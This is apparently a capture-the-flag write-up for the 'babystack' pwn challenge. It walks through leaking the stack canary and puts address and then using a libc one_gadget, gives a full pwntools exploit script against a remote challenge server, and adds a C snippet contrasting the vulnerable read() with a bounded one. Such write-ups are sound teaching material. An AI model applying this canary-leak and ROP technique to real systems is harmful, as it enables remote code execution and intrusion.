0x01 checksec
kk@ubuntu:~/Desktop/black/GFSJ/pwn1$ checksec ./babystack
[*] '/home/kk/Desktop/black/GFSJ/pwn1/babystack'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
IDA
There is a stack overflow at the read() call.
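As an added illustration (not code from this writeup or the challenge binary), the unbounded read() pattern that produces this kind of overflow is shown next to a bounded replacement; the buffer size 0x80, the over-long read length 0x100 and the sentinel word standing in for the canary are assumptions chosen for the demo:

```c
/* Added example, not the challenge's source: an over-long read() beside
 * a bounded version. BUF_SZ, the 0x100 read length and the sentinel
 * value are assumptions for illustration. */
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

#define BUF_SZ 0x80

/* Vulnerable pattern: the length handed to read() exceeds the buffer, so
 * input runs over the stack canary and the saved return address. Shown
 * for contrast only; it is never called here. */
ssize_t vuln_read(int fd, char *buf /* char buf[BUF_SZ] */) {
    return read(fd, buf, 0x100);   /* 0x100 > BUF_SZ: stack overflow */
}

/* Bounded pattern: limit read() to the buffer's real capacity, keep one
 * byte for a terminator and propagate the error return. */
ssize_t bounded_read(int fd, char *buf, size_t cap) {
    if (cap == 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

/* Self-check that needs no stdin: push 0x100 constructed bytes through a
 * pipe into a BUF_SZ buffer placed right before a sentinel word (stands
 * in for the canary). Returns bytes read, or -1 if the sentinel changed. */
long demo_bounded_read(void) {
    int fds[2];
    if (pipe(fds) != 0) return -1;
    char payload[0x100];
    memset(payload, 'a', sizeof payload);           /* constructed input */
    if (write(fds[1], payload, sizeof payload) != (ssize_t)sizeof payload) return -1;
    close(fds[1]);
    struct { char buf[BUF_SZ]; uint64_t sentinel; } frame;
    frame.sentinel = 0x1122334455667700ULL;         /* canary-like: low byte 0 */
    ssize_t n = bounded_read(fds[0], frame.buf, sizeof frame.buf);
    close(fds[0]);
    if (frame.sentinel != 0x1122334455667700ULL) return -1;
    return (long)n;                                 /* 0x7f: capacity minus terminator */
}
```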
0x02 Approach
1. Use the print function to leak the canary.
2. Leak the real address of puts to obtain the libc base.
3. Use the libc supplied with the challenge to find a one_gadget, which is a very useful stretch of code inside glibc that calls execve('/bin/sh', NULL, NULL). For a detailed walkthrough see: one_gadget in glibc.
kk@ubuntu:~/Desktop/black/GFSJ/pwn1$ one_gadget libc-2.23.so
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf0274 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1117 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
4. Build the final payload to get a shell.
0x03 exp
#!/usr/bin/python
# -*- coding: utf-8 -*-
from pwn import *

io = remote('111.198.29.45', 31251)
# io = process('./babystack')
elf = ELF('./babystack')
libc = ELF('./libc-2.23.so')

rdi_ret = 0x0000000000400a93    # pop rdi ; ret
# start_addr = elf.symbols['__bss_start']
start_addr = 0x0000000000400720  # _start: return here so the program restarts after the leak
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
one_gadget = 0x45216             # offset in libc-2.23.so, constraint rax == NULL

print "========leak canary========"
# 0x88 bytes of padding reach the canary; the '\n' that sendline appends
# overwrites the canary's low null byte, so the print option reads past it.
io.sendlineafter(">> ", str(1))
payload = "a" * 0x88
io.sendline(payload)
io.sendlineafter(">> ", str(2))
io.recvuntil("a" * 0x88 + '\n')
# the 7 high bytes come back; restore the low 0x00 byte
canary = u64(io.recv(7).rjust(8, '\x00'))
print "canary=>" + hex(canary)

print "========leak libc_base========"
# padding | canary | saved rbp | pop rdi; ret | puts@got | puts@plt | _start
io.sendlineafter(">> ", str(1))
payload = "a" * 0x88 + p64(canary) + "a" * 8 + p64(rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(start_addr)
io.sendline(payload)
io.sendlineafter(">> ", str(3))  # option 3 makes the function return, firing the chain
puts_addr = u64(io.recv(6).ljust(8, '\x00'))
print "puts_addr=>" + hex(puts_addr)
libc_base = puts_addr - libc.symbols['puts']
one_gadget = libc_base + one_gadget

print "========get shell========"
io.sendlineafter(">> ", str(1))
payload = "a" * 0x88 + p64(canary) + "a" * 8 + p64(one_gadget)
io.sendline(payload)
io.sendlineafter(">> ", str(3))
io.interactive()
Actually I wanted to look up system("/bin/sh") in libc and call that, but it did not work; worth looking into further.
Update 8.21
The script shows "sh not found".
Probably because the remote server has no sh.